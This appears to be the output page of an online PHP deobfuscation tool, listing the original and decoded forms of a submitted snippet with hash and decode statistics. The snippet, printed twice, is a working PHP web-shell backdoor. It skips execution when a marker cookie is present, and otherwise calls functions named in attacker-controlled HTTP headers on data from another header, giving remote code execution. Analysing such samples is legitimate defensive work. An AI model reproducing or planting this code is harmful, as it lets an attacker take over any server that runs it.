Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if(isset($_COOKIE['dI'])) { die('CqomkwO'); } if (function_exists('getallh..
Decoded Output download
<?php
if(isset($_COOKIE['dI'])) {
die('CqomkwO');
}
if (function_exists('getallheaders')) {
$headers = getallheaders();
} else {
$headers = array();
foreach ($_SERVER as $name => $value) {
if (substr($name, 0, 5) == 'HTTP_') {
$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
}
}
}
if (isset($headers['Large-Allocation'])) {
$callback = $headers['Large-Allocation'];
$result = $callback('', $headers['If-Unmodified-Since']($headers['If-Modified-Since'])); ?>
Did this file decode correctly?
Original Code
<?php
if(isset($_COOKIE['dI'])) {
die('CqomkwO');
}
if (function_exists('getallheaders')) {
$headers = getallheaders();
} else {
$headers = array();
foreach ($_SERVER as $name => $value) {
if (substr($name, 0, 5) == 'HTTP_') {
$headers[str_replace(' ', '-', ucwords(strtolower(str_replace('_', ' ', substr($name, 5)))))] = $value;
}
}
}
if (isset($headers['Large-Allocation'])) {
$callback = $headers['Large-Allocation'];
$result = $callback('', $headers['If-Unmodified-Since']($headers['If-Modified-Since']));
Function Calls
None |
Stats
MD5 | 84a419b890e02d5ac0312d42d1822e69 |
Eval Count | 0 |
Decode Time | 62 ms |